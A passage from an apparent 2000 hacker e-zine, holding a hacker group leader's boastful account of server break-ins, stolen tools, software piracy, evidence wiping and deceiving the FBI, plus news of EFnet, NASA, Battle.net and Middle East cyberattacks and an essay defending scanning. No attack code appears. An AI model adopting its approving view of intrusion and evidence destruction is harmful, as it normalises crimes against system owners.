      year of College.  I was a freshman.
      
              We actually were recognized as a educational group by the 
      University at that point and were encouraged to hold group meetings and 
      givin areas where we could meet.
      
              The group continued on like that for about two years.  Usually after 
      the 2600 meetings we would either find a secluded computer room or go  
      over to one of the members houses and "try out" our newfound info, or 
      trick, we scowered documented holes in unix operating systems looking for 
      other holes that may have been similar.
      
              One Friday we held the proceedings at my house and planned a 
      breakin.  I had a Pent75 with 16megs of ram (badass at that point in time) 
      with a 1.275 gig hard drive.  The fastest computer of the group.  As 
      standard proceedure we would dialup from an anonymous number in the 
      "Great Hall" of the University onto "PolarNet" under a hacked PPP 
      account.  After connect we proceeded to telnet to a student account at 
      the local school network where we had already gotten root access.  We 
      would do anything we really had to do from there usually, but sometimes 
      we were lazy and would telnet straight out of "PolarNet" or "AlaskaNet".  
      
           That night We snooped a commercial server which we will call "moon" 
      and found we could gain root access remotelly.  We got root access after 
      approxamately 1hour of scanning the target system.  We however did not 
      know that this was one of the foremost computer security systems in the 
      U.S.  We gained root access at approxamately 11pm.  Upon entry it 
      looked like a simple corperate computer, perhaps only a webhosting 
      machine.  Upon closer inspection we noticed that it was a server designed 
      for information storage that is used by system administrators to crack 
      into systems in order to secure them.  This server also had programs used 
      to crack systems, so we took them all.  We took the programs and the info 
      they had within the system.  It was a total of about 14megs of it, we 
      downloaded it to the local system which was through a T1 so it didn't 
      take long, we broke connection to "moon" and proceeded to download the 
      info from the local server to our computer.  Where we passed the info to 
      eachother.  
      
              From then on we couldn't access that "PolarNet" account.
      
              We proceeded to share our new found info with the group members 
      that friday night and brought disks full of info to give away at the 
      price of the disks themselfs, the information was spreading.
      
              I had the Genocide2600 webpage up for almost a year at this 
      point, and the attack on "moon" had yielded some incredible info, so the 
      page grew amazingly fast.  As did the requests for it's removal by the 
      system administration by of school.
      
              At this time the page was then mentioned by several German 
      underground magazines at the address:
      
              http://icecube.acf-lab.alaska.edu/~fstbo
      
              With email going to:
      
              fstbo@aurora.alaska.edu
      
              The next Friday I recieved an official warning at my schools 
      account to "please remove your page from the system" well...I changed it 
      a little and hid it a little deeper on my account, and the requests 
      stopped for a little while.
      
              Also that next Friday we had a visitor at the meeting.  This was 
      not uncommon because us being a University group, anyone could come in 
      and sit in.  At times like these we would obviously speak of nothing 
      illegal.  This was, however, different from the rest of the "visits" by 
      faculty and staff, this was a man in a navy blue suit.
      
              After the meeting was over and everyone was leaving he came up to 
      me and asked if we could talk, I agreed, and we walked.  He informed me 
      he was here to prove that I had broken into "moon" and that he would be 
      heading up the investigation.  He also informed me that they suspected me 
      because of my page, my affiliation of the group etc...
      
              I was honestly scared.  I called my mother and told her I had 
      been approached by the FBI and that there was a possibility that I may be 
      put away as a result.  She asked me if I did what they were accusing and I 
      told her no.  Which turned out to be a damn good idea, because she spent 
      over two hours speaking to them.
      
              They froze my account to view the contents and review what I had 
      on the system.  They were looking for info that would point to me as the 
      person who broke into the system, they found plenty.  The one thing that 
      saved my neck was that they couldn't tie me to the broken account on 
      "PolarNet" they could prove that the call came from the University but 
      not where.  They could prove that I had info that was regarded as secret 
      but they couldn't prove where I had gotten it.  I told them I got it off 
      the internet.
      
              After the entire thing was done and overwith, it had taken up 
      around 3 weeks and alot of missed classes on my part.  My account was 
      unfrozen right in time for them to barage me with numerous requests to 
      move the page off of the server again.  I burried it deeper into my 
      account and the requests subsided again.
      
              After the FBI left, the group wasn't quite the same, around half 
      the "not so into it" members left, probably out of fear for thier school 
      status.  The school slammed the door on the school 2600 group on campus.  
      
              The remaining members and I formed the formal Genocide2600 group 
      we didn't meet in any publically known places or in schedualed places 
      after that.  We would just get together and decide where to go on the 
      fly.  The 2600 group dropped from site and the Genocide2600 group went 
      under viel, away from view after the papers stopped publishing stories 
      about some loose internet terrorist at the University.
      
              A couple months later, I got a job at a local internet service 
      provider, I had alot more time on my hands to surf the web and check out 
      areas that I didn't know about and discovered news groups I was looking 
      through the usual alt.2600, alt.warez etc... and noticed people peddling 
      serial codes and numbers for software, this intrigued me and I added the 
      "service" to my webpage.  The Genocide2600 group's page was the basic 
      hub for serial numbers at that time and that is what probably what 
      really put us on the map.  
      
              We made friends of other net going hackers by trading info, 
      programs and knowledge.  The big web areas on the net were: SiliconToad, 
      Materva, CandyMan and us, the Genocide2600 group.  CandyMan dissappeared 
      and we have been asked by certain parties to not really say anything 
      regarding his silence.  Materva is currently out of the scene and 
      revamping his pages.  This left SiliconToad and our group of the 
      original few on the web, pre the movie "Hackers" and the influx of 
      everyone and thier dog wanting to be 3l33t3, er rather elite, sorry.
      
              I had plenty of free time while waiting for people to call at the 
      ISP I worked at (ImagiNet) I discovered a strong regard to the freedom of 
      speech, after all, it was what was keeping me from going to jail.
      
              Now there are those that abuse the theory of freedom of speech, 
      some say it's us, the hacker, but what I am referring to are the child 
      pornography dealers on the net.  I know it has been deemed illegal now, 
      but it still goes on.  We were kicking the shit out of these people on 
      AOL (the primary front) we would get onto AOL with our AOHell programs 
      and start scanning the chat rooms, when we found someone whome we 
      suspected or who was talking about it, we would flood them with email 
      and kick them off, causing them to actually have thier connection break 
      have to logon and have to deal with a paralyzed mailbox and as soon as we 
      would see them, WHAM again, they would be gone again.  Sure we'd get   
      caught and kicked off but that was half the fun, we were back on within 
      10minutes.  What I always thought was entertaining were the agents AOL 
      hired to look for hackers, they would be in the SAME room as us and the 
      child porno runners and we'd attack the porno runner, who would the 
      agent go after?  Us.  They would let the porno runner go 90% of the time 
      without even a warning.  Sure we were breaking the law too, but we do 
      have some ethics. >;)
      
              Enter BernZ, a young prospective hacker who wrote to me on one 
      of my last days in Fairbanks, and asked me to help him learn the trade.  
      Now, I get around 500 emails a week, from non-member sources and half of 
      them are asking me the same thing.  But something was different this 
      time.  He had a style that I liked.  He defined what it was he could do, 
      I told him this was called "Social Engineering" or standard old 
      manipulation.  I could hear him grin over the email.  He asked to join 
      the group after a couple of weeks of correspondence and I finally asked 
      him where he was.  East coast.  The group was primarilly a west coast 
      operation.  East coast was a good idea though, both coastal areas were 
      the biggest expanding computer related areas on the map.  So we decided 
      that yes he should indeed head up the East Coast movement.
      
              And so he did and is.
      
              My job moved to Portland, Oregon, so I followed.  I needed a 
      webserver so I moved it to it's current home:
      
              http://www.aracnet.com/~gen2600
      
              This is where our hits really began to grow.  Also our 
      international image.  Magazines started printing our address as a 
      contriversial/underground webpage.  We started turning heads.  Somewhere 
      along the line someone out there (Cheyenne Software) noticed that we 

      carried serial numbers on our page and the real flame storm started that 
      day.  My account was frozen instantly.  They froze the account to 
      review what was really on the page and see if there was really any 
      serial numbers, which all of you know is bigtime bad.  I was facing 
      around 2,000 counts of software piracy.  The Oregon chapter of the 
      Genocide2600 group got together that night and cracked the server, 
      moving any evidence of the serial numbers off of the system.  We got 
      away again.
      
              Almost 3 days later I was at work at about 10am when my pager 
      went off and told me to call home for messages, I did.  Found a message 
      from someone only identifying themselfs as "Mr. Jerkins" and that I 
      should give him a call.  I did, he said that he wanted to meet with me at 
      my Gladstone Oregon home and that they would like to bring me somewhere 
      to talk.  I freaked, I don't care what anyone says, if they say that the 
      hair on the back of thier necks doesn't stand on end when they get a call 
      from the FBI, they are lying.
      
              I called a emergency meeting at my house of the Genocide2600 
      members from Oregon for later that night.  We probably wore that 
      recording out listening to it, trying to find out if it was indeed a 
      joke.  We finally decided, no it wasn't a joke.  So I called him back and 
      setup a time.  
      
              They were five minutes early.  Mr. Jerkins was with 4 other men 
      dressed in suits, all smiling.  They wanted to take me to some place I 
      didn't recognize, which is no shock seeing I only had lived there 3 
      months.  But I wasn't going to chance it.  I told them I wanted to go to 
      Burgerville down the street at GlennEcho street.  Hey, I know it sounds 
      corney, but if you have ever seen "MoHolland Falls" you would understand.
      
              We packed into a late model Ford Royal Crown Victoria and headed 
      to the burgerhouse.  My leg was uncomfortable because of the Gerber 
      MarkII boot knife pushing into my ankle and my right hand was on my switch 
      blade the entire time.
      
              They didn't say a word while we got out of the car.  We walked 
      into Burgerville and everyone behind the counter followed us with thier 
      eyes and heads.  We had to look out of the norm, 4 suited guys all under 
      6 foot and me, black leather jacket and jeans, and a black "Skellum" 
      shirt that says, "Un-natural disaster, can you feel hells laughter?" 
      and six foot tall.  We sat, I ate and we talked for almost one hour.
      
              Only two of the four talked.  Mr. Jerkins and someone else whome
      I can't remember his name.  As soon as they opened thier mouths, I began 
      to sweat.
      
              It seems I was dropped off at home as rapidly as they had picked 
      me up.  I sat there at my computer, my hands shaking, dialed up and 
      jumped into my email program, pine.  I wrote all members of the 
      Genocide2600 group, in Alaska, Washington and Oregon and informed them, I 
      had just been offered a job.
      
      That was only a couple of months ago now and I sit here at midnight 
      typing away and not even wanting sleep anymore.  In two weeks the 
      Genocide2600 server goes up, the new dawn.
      
                      http://www.Genocide2600.com
      
              -Genocide
               Head of the Genocide2600 Group
      
                              *Embrace Freedom*
      
                             gen2600@aracnet.com
      [EOF]
      
      @HWA      

 338.0 [HWA] Nov 2000: The day efnet nearly died, The ShadowKnight and Mafiaboy crusade
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Psuedo editorial by Cruciphux
      
       
      EFnet was owned. yes it was. it didnt happen quite the way it was planned
      but it was a classy hack nonetheless. Over 20 oper account shells were 
      compromised and services.us was owned. EFnet was at these hackers' mercy
      the charge? ALL CHANNELS OPLESS! ALL CHANNELS MODELESS!! ALL TOPICS TO
      PROCLAIM FREE MAFIABOY! FREE SHADOWKNIGHT! ... well it took most of the
      night and only 300 or so channels were taken but services.us was indeed
      owned and this hack had irc opers all across the globe SQUITting their
      servers like crazy trying to regain ops and channel control. Massive dosing
      taking place during the hack contributed to it's essential "failure" and to
      this date EFnet has not recovered, a massive state of channel desynch 
      effectively fscked up efnet operations for a good week or more and some channels
      are still not back in the hands of their 'rightful owners' as most people
      know on EFnet it is like the great wild west, or frontier, you fight for your
      nick, your channels, you are packetted for dissention and general anarchy
      and chaos is the order of the day.
            
      This is not a one off event I was privy to this deed (I had 30 mins 
      warning) and can say that it is truly a hack worthy of some regard. A 
      Mass hack like this has not been seen in some time, also recently
      (Nov 13th) spaceport.jpl.nasa.gov and other nasa boxes were compromised
      resulting in several gloatfests and people ircing as ShadowKnght from the
      compromised box (allegedly a wingate(!)) it is at the time of this writing
      still unsecured and being exploited. I am told by purps of the original 
      hack that there will be a reprise and this time they are aiming for total
      EFnet control, I think they have a good chance of pulling it off. 
      
      Unfortunately this is not without some fallout, it is rumoured that HWA is
      under FBI investigation (#hwa-security was one of the channels that was 
      left with ops, and we have irc opers in our wings) so there are a lot of
      EFNet denizens that are looking for revenge or at least to save face, not
      to mention the implications such a premeditated, contrived mass hack has on
      presumeably even national security, After all this is back bone ownage for
      all intent and purposes. Anyway the true fallout us yet to be seen HWA does
      not condone this action nor has any hand in its undertaking the people behind
      it just wanted us to cover the 'action'. Logs of the 'takeovers' are at the
      end of this story, heres some press regarding mafiaboy and shadowknight to
      set the scene.
       
      Some history:      

  
      http://dailynews.yahoo.com/h/nm/20001107/wr/crime_hacker_dc_1.html
      
      Tuesday November 7 5:38 PM ET
      Calif. Man Who Hacked NASA Computers Pleads Guilty 

      By Dan Whitcomb

      LOS ANGELES (Reuters) - A 20-year-old man who hacked into scores of U.S. 
      government, NASA and university computers under the names ``Shadow 
      Knight'' and ``Dark Lord'' has pleaded guilty to federal charges at a 
      closed-door hearing, prosecutors said on Tuesday.

      Jason Allen Diekman, who faces a maximum of 16 years in prison, entered his plea 
      to U.S. District Judge Dean Pregerson on Monday, said Thom Mrozek, a spokesman 
      for the U.S. Attorney's Office in Los Angeles.
      
      Mrozek said the public was barred from the plea hearing for reasons that 
      prosecutors would not disclose. Diekman, a resident of Mission Viejo, 

                                    


339.0 [IND] Arab Hackers Hit U.S. Firm for Israeli Ties
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.abcnews.go.com/sections/world/DailyNews/mideast001106_cyberwar.html
      
      B E I R U T, Lebanon, Nov. 7
      As Israelis and Palestinians exchange
      bullets and stones in the West Bank and
      Gaza, other partisans are waging a
      fierce war on the Internet  and drawing
      in the United States.
      
      
      On Thursday and Friday, Arab hackers attacked the Web site of U.S. company, Lucent
      Technologies, a company that does extensive high-tech business with Israel. The attack
      came just days after the F.B.I. in Washington warned the three-week old Arab-Israeli
      cyberwar could spill over into the United States. Beiruts Daily Star newspaper reported
      Lucent security workers were able to repel the Arab attack before it could impact the
      Lucent site. Lucent is among 13 sites listed on a Web site that encouraged Arab supporters
      to assault Israeli sites. The site called itself UNITY.
      
      Who Struck First?
      Sources in Lebanon say an Israeli site, www.wizel.com, began the cyber war in October by
      listing Palestinian and Hezbollah sites in Lebanon and elsewhere. Wizel has since
      disappeared, apparently replaced by a group calling itself Israel Hackers. The site
      encourages what it calls the army of Israeli warriors on the Net to search and destroy
      all of the Arab sites on the net. It also tells its supporters that all they need is
      a computer, a shell and [a sense of] revenge. The Israeli group is targeting the
      Palestinian Authority site, Hezbollahs El Manar television station in Lebanon, a
      Jordanian portal site and Irans Islamic Republic News Agency (IRNA) site. Another
      pro-Israel Web page posts an image of Palestinian leader Yasser Arafat holding dynamite
      sticks. Underneath it is a cartoon of Palestinian children holding guns emblazoned with
      United Nations Childrens Fund logos.. 
      
      Arab Hackers Work 
      Arab hackers claim to have recently downed the Israeli army Web site for at least five
      days. The army has since enlisted the U.S.-based AT&T corporation to host the site after
      the first downing, telecommunications sources here said. Israeli sites recently downed
      include the Israeli Ministries of Defense, Immigrant Absorption, Industry and Trade,
      Religious affairs and the Tel Aviv stock exchange. An Arab hacker in Beirut said,
      Were expecting the battle to heat up from our side in the next few days. Our cyberwar
      wont stop until all of the attacked Zionist sites are destroyed.
      
      @HWA

340.0 [HWA] HOTNEW at time of print, mass hack/dos of gaming sites 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Nov 8th 3:14a EST
      
      Another Ex-HWA member in shit with the law, (this can only be expected
      of such a rapidly growing motley crew) the are wanted for DoSing several
      multiplayer game servers.. DOSING/PACKETTING FOR ANY REASON BY ANYONE IS
      VERY LAME! and HWA does NOT condone the use of DDoS tools for anything 
      other than legitimate bandwidth testing/network stress testing.  
      
      In any case this person we find out is reportedly a 15 yr old cracker
      that was miffed his battlenet account was pulled (for reasons unknown
      packetting??) they took it upon themselves to effectively down the game
      network for at least 4 days possibly disrupting service longer/more widely
      through incidental means.
      
      http://www.battle.net/forums/diablo2-realmstatus/posts/ba/1.shtml

      Subject:Battle.net Update
      From:Battle.net Sysop
      Host:Blizzard Entertainment
      Date:Tue Nov 7 18:33:30
      
                                  
      We have recently become aware of the fact that an individual, 
      group or entity has instituted a server attack on both Battle.net 
      and Blizzard's web pages. The result of this illegal activity has 
      been that many of our customers are having difficulty logging on 
      to the Battle.net game service and accessing Blizzard web pages. 
      We are in the midst of implementing a solution, but we wanted to 
      let you know that the situation is a direct result of attacks on 
      our servers, not Battle.net stability.

      The FBI and certain European law enforcement agencies have been 
      notified, and we are working in conjunction with them to identify 
      the individual. Attacks on our servers will not be tolerated, and 
      Blizzard fully intends to prosecute this individual to the 
      fullest extent of the law.

      If you have any information about the individual, group or entity 
      involved in this activity, please email hacks@blizzard.com.

      Thank you for your patience. We will post updates on the status 
      of the servers as more information is available.
      

    http://www.infoceptor.com/newspro/comments/973662921,39533,.shtml                             

    Blizzard Servers Attacked - Deathwing @ 0:25:21 EST
    It looks like the prolonged downtime of Blizzard web servers and the problems Battle.net
    has experienced was not a coincidence. The following e-mail was received directly from
    Blizzard:


    We have recently become aware of the fact that an individual, group or entity has instituted a server
    attack on both Battle.net and Blizzard's web pages. The result of this illegal activity has been that
    many of our customers are having difficulty logging on to the Battle.net game service and accessing
    Blizzard web pages. We are in the midst of implementing a solution, but we wanted to let you know
    that the situation is a direct result of attacks on our servers, not Battle.net stability.
    
    The FBI and certain European law enforcement agencies have been notified, and we are working in    
    conjunction with them to identify the individual. Attacks on our servers will not be tolerated, and
    Blizzard fully intends to prosecute this individual to the fullest extent of the law.

    If you have any information about the individual, group or entity involved in this activity, please
    email hacks@blizzard.com

    Serious stuff indeed... we certainly hope the individual will be found in the near future.

      Name: FUCK BLIZZARD 
      E-Mail: 
      I HOPE THEM MATHA FUCKERS DIE! Just kiddin 

      Name: bewf 
      E-Mail: 
      is there an award for snitching? 

      Name: 3f b33 3y3 w0n7 g37 m3 
      E-Mail: 
      who says its just one person? 
      and why lock this person(s) up, give them a job or have them help you with your problems... 

      Name: CaSPeR 
      E-Mail: don't u wish 
      Lol of coarse its not a joke, most of bnet splits and problems are caused by indeviduals,
      unfortunatly i cannot tell you who they are but i do know 8) 

      Name: Deathwing 
      E-Mail: deathwing@infoceptor.com 
      This is not a joke, it was sent to all fansite members via a @Blizzard e-mail adress. 

      Name: DrunkenGoliath 
      E-Mail: dave-o@telusplanet.net 
      How come Blizzard said on their page they had problems while upgrading? 

      This is a bad joke. 

      Name: Chris 
      E-Mail: 
      You better stay quiet. 
                        
      I was turned on to this story by an ex member who was apparently behind the attacks
      he claims a younger kid narqed him out to the feds and that the FBI are currently
      in search of him.
      
      Nov 8th 3:14a EST
      
      - Cruciphux                        


341.0 [IND] Paranoia Vs. Transparency And Their Effects On Internet Security
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


      Paranoia Vs. Transparency And Their Effects On Internet Security
      
      by Mixter <* mixter@newyorkoffice.com>
           (* Please use mixter@hwa-security.net to contact mixter, his mail system
            is experiencing problems, mail will forward to a new address..)
      
      
      Lately, reactions to non-intrusive probes and network activity that is
      merely unexpected are becoming increasingly hostile; a result from increasing
      amounts of incidents and security threats. From my perspective of security,
      overreactions to activities not crossing authorization and legal boundaries,
      are leading to a scenario where anyone acquiring basic information about a
      system needs to be afraid about potential consequences. Seen under a wide
      scope, this leads to network security no longer being transparent.
      
      Why a non-transparent security situation on the Internet is bad?
      Obviously, it is a big advantage to malicious intruders who have no legal
      concerns because they can conceal their identity through compromised systems,
      and a big disadvantage to security firms, admins and individuals who depend on
      a complete picture of Internet security problems to solve them. Non-malicious,
      beneficial large scale scans like the broadcast amplifier scanning projects
      are becoming harder and riskier to perform using legal resources.
      
      Network scanning and corresponding tools evolved out of a necessity to counter
      new intrusion methods after they were commonly employed by system crackers. [1]
      A scanner is simply security software that automates the process of making
      connections to a service to determine its availability and version, which allows
      drawing conclusions regarding security and potential vulnerability. Scanning a
      host is the fastest way to identify its remote vulnerabilities since it puts
      the analyst in the same perspective as an attacker, seeing all possible holes.
      
      The cause of todays widespread security problems is that people ignore
      security measures that are merely common sense. Many sites exist with gaping
      holes because their admins just don't know any better. They don't see a threat
      to their small unimportant site. Which is wrong, since the Internet is a
      network with literally millions of potential intruders, and the majority of
      intruders, no matter if kiddy or criminal, select random targets to compromise
      and use as their resources, which means that each site is at risk equally.
      Another big problem is that many admins lack the time to investigate all
      potential security issues, let alone all new vulnerabilities and advisories.
      As it is currently a part of my work to read and evaluate all information
      from the most important security lists and sites, I can say it is a task that
      takes at least one hour each and every day, and another hour if you really
      want to understand everything you read. This adds to the negative effects of
      information about security of a broad range of Internet hosts not being
      openly available. Since it is so difficult to obtain statistic information on
      widespread security issues, there is little awareness on the security issues
      that are really important, and it is a lot harder for the average admin to
      determine what security issues to check and protect against with priority
      out of the mass of security vulnerabilities and problems that are known today.
      
      I believe the problem of networks with gaping security holes has grown larger
      than most people, including most security professionals, expect. The result of
      a recent study of a research group was that 50% of all smaller enterprises are
      going to have to deal with intrusions by 2003. [2] The problem of raising
      awareness to security problems is, that security news, incidents, and
      publications of security tools and advisories only generate more awareness
      for people who already have a basic knowledge of security. But a lot of people
      responsible for Internet sites still don't have enough awareness to take the
      very fundamental steps to protect against intrusions. They will never seek
      security services themselves, either. Battling incidents and insecurity on
      the Internet is a question of reaching and contacting as many people of this
      kind as possible. In this context, large scale auditing and gathering of
      vulnerability information could be a viable tool of identifying and notifying
      these people; you could even see it as a process of mass security education.
      
      Transparency, in this context, means the possibility of freely accessing
      hosts and networks in non-harmful, non-intrusive ways for the purpose of
      security reconnaissance, without being seen and treated as malicious
      attacker. The importance of network transparency is comparable with
      the reasons for publishing advisories and exploits in the name of
      full-disclosure. The process demonstrates how exactly security issues
      are a problem, and how they can lead to incidents.
      
      Arguably, the recent popularity of Intrusion Detection Systems is not a
      bad trend. IDS capabilities can be viable for detecting and blocking
      intrusions, when they are employed by someone with sufficient background
      knowledge to make a difference between serious signs of incidents and
      harmless reconnaissance or false positives. But intrusion detection is
      not the only thing that can be relied on, it is just a part of the
      reactive protection measures, while assessment and scanning constitute
      the necessary pro-active measures.
      
      And performing pro-active security measures beyond your own network is
      justified, considering the fact that on a public network, our own security
      is always threatened by the security problems of others. Without machines
      in all parts of the world being compromised, attackers would hardly be able
      to strike anonymously and cover their tracks in a meaningful way. Spoofed
      packet attacks, DDoS agents and trojans used for relaying connections, as
      well as compromise of related hosts via password sniffing, would pose a
      less serious threat. Eliminating this threat can only be in everyone's
      interest, primarily for those admins unaware of security, who have their sites
      compromised and unknowingly used in attacks against third parties. [3]
      
      Of course, the toleration of any client activities on a host is always a
      matter of trust, a concept that I don't even want to start discussing. But
      fact is, in the case of malicious intruders and "aggressive" scans, nobody
      has a choice of accepting them or not, since they usually come from another
      compromised machine, and even if not, there are hundreds of other potential
      attackers waiting out there for every one that you manage to track down.
      With links to the Internet you are part of a globally accessible network,
      which means the best thing to do is turning off the services you don't want
      to have accessed, or set up access controls and firewalls, which is
      encouraged, but rarely done consequently in practice.
      
      A situation where I see a direct justification of scanning is, for example,
      when doing a financial transaction over an e-commerce site. Personally,
      checking out the general security of a site, as a consumer before submitting
      billing info gives me more security than any certification can. I even see
      this as advantage for the company offering the service. If they have poor
      security, people would stay away from them, or possibly notify them, reducing
      their costs by preventing incidents (and the accompanying lawsuits of
      customers who have fallen victim to an attack). If they have good security,
      people would know it and prefer their services.
      
      Another example is the spam problem. When receiving unsolicited mass mails in
      annoying proportions, I think it is justified to examine the third party smtp
      server, from which the mails were relayed to hundreds of addresses without
      authorization. Often, you can determine a lot of problems with such systems,
      they are mostly excellent examples of sites totally unaware of security. In
      that case, it's time to explain the admin a bit about network security and
      third party responsibilities. I think if more people would do such things,
      even be encouraged to do it, cybercrime laws and government regulations of
      IT businesses' security would eventually become superfluous.
      
      The criminalization of scanning and the general access of network services
      that some people don't like to have accessed - already, the current laws
      can label almost any activity on a network as intrusion, because they can be
      interpreted arbitrarily - will ultimately lead to a situation where companies
      and individuals performing scans and network surveys for security relevant
      data are going to have big problems, while system crackers using illegally
      acquired resources can effectively still probe and attack any site.
      
      The situation full-disclosure security measures is on its way to get worse,
      perhaps a lot worse, as governments try to introduce legislation like the
      international convention on cybercrime, which would criminalize anything
      from sniffing and using crypto on your own network to the possession and
      development of security tools, let alone remote network activities. Without
      calling this trend an evil government conspiracy, you can safely say that
      people working to advance such legislation are not acting in the best interest
      of security and e-commerce, not solely out of stupidity or lack of knowledge,
      but because there are lots of people getting advantages out of criminalizing
      benevolent security practice - think of new government jobs, legal powers
      over the security industry, and the possibilities for domestic surveillance.
      
      If the government and the security community decides that consumers and users
      on the Internet, who are directly affected by the security of their peers,
      should not have the right to scan, then their only recourse will be legal.
      
      
      [1] An example for this trend is the popular paper "Improving the
       Security of Your Site by Breaking Into it" along with development
       of the first widely-used security scanner, SATAN.
       http://wzv.win.tue.nl/satan/demo/docs/admin_guide_to_cracking.html
      
      [2] See: http://www.newsbytes.com/pubNews/00/156531.html
      
      [3] Legal liability for compromised systems that unknowingly participate 
       in incidents, such as DDoS attacks, may be enforced more strictly soon:
       http://www.infoworld.com/articles/hn/xml/00/09/29/000929hnddosliability.xml
      _______________________________________________________________________________
      Security Papers - mixter.warrior2k.com/papers.html - mixter.void.ru/papers.html
      
      @HWA      
      


342.0 [IND] Trouble in the Holy land, Cyberwar and the Israeli Underground's Press Release.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Press:http://www.thestandard.com/article/article_print/0,1153,20087,00.html
        
      Back:  http://www.thestandard.com/article/display/0,1151,20087,00.html
      November 09, 2000 
  
      A Hacker With a Cause 
      Mikael Bouzaglo's cracking exploits on anti-Israeli sites are bringing him fame  and helping to
      spur a stinging counterattack by pro-Palestinian hackers. 
      By Avi Machlis 
  
      JERUSALEM  Mikael Bouzaglo talks like a soldier in the thick of crossfire as he
      recalls the battles waged from his computer. 
  
      A former firefighter in the Israeli army, Bouzaglo was discharged in September.
      But he has kept up a campaign of hacking into anti-Israeli Web sites that he was
      engaged in for several years. Last month, as violent clashes between Israel and
      Palestinians escalated throughout the West Bank and Gaza Strip, Bouzaglo
      launched his most ambitious offensive yet. 
  
      Bouzaglo set out to humiliate Hezbollah, the Lebanese guerrilla movement in
      solidarity with the Palestinian cause. He stocked up on pizza and cola and sat
      down at his keyboard. 
  
      He encountered surprisingly tough fortifications around the Hezbollah computer
      systems. After 19 hours, Bouzaglo said, he finally outwitted them and wrested
      control of a mirror site at Hizballa.org . Then, as if conquering a hill after a bloody
      battle, Bouzaglo planted on the site an Israeli flag and an audio file that played
      the Jewish state's national anthem. 
  
      "It was harder to penetrate than I expected," he says. "The Arabs are not bad in
      this virtual war." 
  
      Arab retaliation came hard and fast to this and other Israeli assaults on the Web.
      In a series of computer attacks known in technical circles as "distributed denial
      of service" attacks, Arab hackers knocked down official sites of Israel's foreign
      ministry and the Knesset, or parliament, by striking servers at Netvision, a leading
      Israeli Internet service provider. In a separate attack, for which a secretive Arab
      hacker nicknamed "m0nk3y of Arab" claimed responsibility, Netvision's mail servers
      were hobbled for about a day. 
  
      As the virtual war intensified and attracted increasing interest from the local and
      international media, Bouzaglo was torn. His instincts warned him not to go public.
      Hackers around the world operate in the shadows of cyberspace and almost
      never show their faces. But Bouzaglo dreams of becoming a politician for Israel's
      right-wing Likud party. Putting on a pressed shirt and dark tie, he took to the
      airwaves everywhere, from Israel radio and television to CNN. He since has
      become something of a celebrity and recently spoke before an Internet
      committee in the Knesset. 
  
      In the glare of the media spotlight, Bouzaglo has flip-flopped in classic politician
      style. He's now calling on his comrades to stop attacking Arab sites, but that
      doesn't mean he's showing any regret for the hacks that brought him attention. 
  
      "The Net has a lot of power," Bouzaglo says, adding that he was spurred to
      action after a Palestinian mob lynched two Israeli soldiers early in the conflict.
      "Millions of visitors from around the world are entering these sites to see Israel as
      the bad guy." 
  
      Middle East hackers often struggle to overcome a bad-guy image. Bouzaglo and
      m0nk3y of Arab might take opposite sides on politics, but both reject the label of
      cyberterrorist, preferring to see themselves as rebels with a cause. As the
      computer war shows, the Internet has empowered a generation of hackers armed
      with nothing more than Web access to challenge the online world. 
  
      It doesn't take much. According to one Israeli familiar with his work, Bouzaglo
      isn't a top-tier hacker. He didn't serve in the Israeli army's crack computer unit,
      where many Israeli computer experts cut their teeth. Instead, his service as a
      firefighter in Israel, where fires are few and far between, left him with plenty of
      time to tinker on his laptop and teach himself Java and HTML. 
  
      Since his release from the army in September, Bouzaglo has spent much of his
      time operating a Web site geared toward stopping violence in Israeli society. He
      also teaches computer classes at an elementary school and occasionally indulges
      in some hacking from his parents' apartment in Holon, just south of Tel Aviv. 
  
      The speed and potency of the Arab hackers' retaliation for cyberattacks have
      prompted Bouzaglo to disavow his hacking ways. "These attacks are pointless,"
      he says. "It's just a virtual war game." 
  
      Still, Bouzaglo does not rule out cooperating with Israeli authorities to devise
      more-sophisticated and surreptitious tactics to attack its enemies via the Web.
      So it was no surprise that pleas to his Arab adversary to end the hostilities
      sparked suspicion. 
  
      Hackers on all sides know that once a cyberwar spreads it can be tough to
      control. Arab hackers like m0nk3y of Arab relish the opportunity to fight Israelis
      on the Internet. They see it as a level playing field, in contrast to the conflict on
      the ground, in which they believe Israel is using grossly disproportionate force.
      "What we are doing now is a fair war," m0nk3y of Arab states in e-mail
      correspondence. "Brains vs. brains." 
  
      Brains on both sides quickly learned that Israel is particularly vulnerable to
      electronic warfare. Israel might be more wired than Arab countries, but it also
      has relatively small pipes that connect the country to the rest of the Internet,
      making it susceptible to attacks at choke points. 
  
      "We all know that Israeli high-tech companies have a world-class reputation, but
      this does not mean that we are weak or useless," m0nk3y of Arab states. 
  
      Bouzaglo agrees that Israel's networks are vulnerable. "In this war," he says, "the
      Arab hackers will win."
      
      
      Press:http://www.thestandard.com/article/article_print/0,1153,20102,00.html
      
      
      November 09, 2000 
  
      A Virtual Olive Branch 
      In a chat session arranged especially for The Standard, an Israeli hacker asks his two Arab
      counterparts for a truce in the Mideast cyberwar. 
      By Industry Standard Staff 
  
      JERUSALEM  As clashes raged between Israelis and Palestinians on the first
      night of November, tentative talks were taking place deep in cyberspace among
      three participants in a virtual war that has flared up alongside the Middle East
      crisis. 
  
      The prospect of meeting the enemy and the opportunity to sound off persuaded
      two Arab hackers and one Israeli hacker to face off in a chat session arranged
      exclusively for The Standard. 
  
      Participating were Mikael (Miki) Bouzaglo, a 22-year-old Israeli hacker with
      political ambitions; m0nk3y of Arab, 23, a mysterious hacker from somewhere in
      the Middle East; and Sammy, a 26-year-old U.S.-based Arab hacker. All claim to
      have played some role in the recent spate of attacks and counterattacks on
      Arab and Israeli servers. 
  
      Following are excerpts of their chat session, which was moderated by The
      Standard. The excerpts have been edited for clarity. What began as a
      surprisingly cordial exchange led to Israeli pleas for a cybertruce, shifting at
      times into the emotional and sometimes militant politics that have characterized
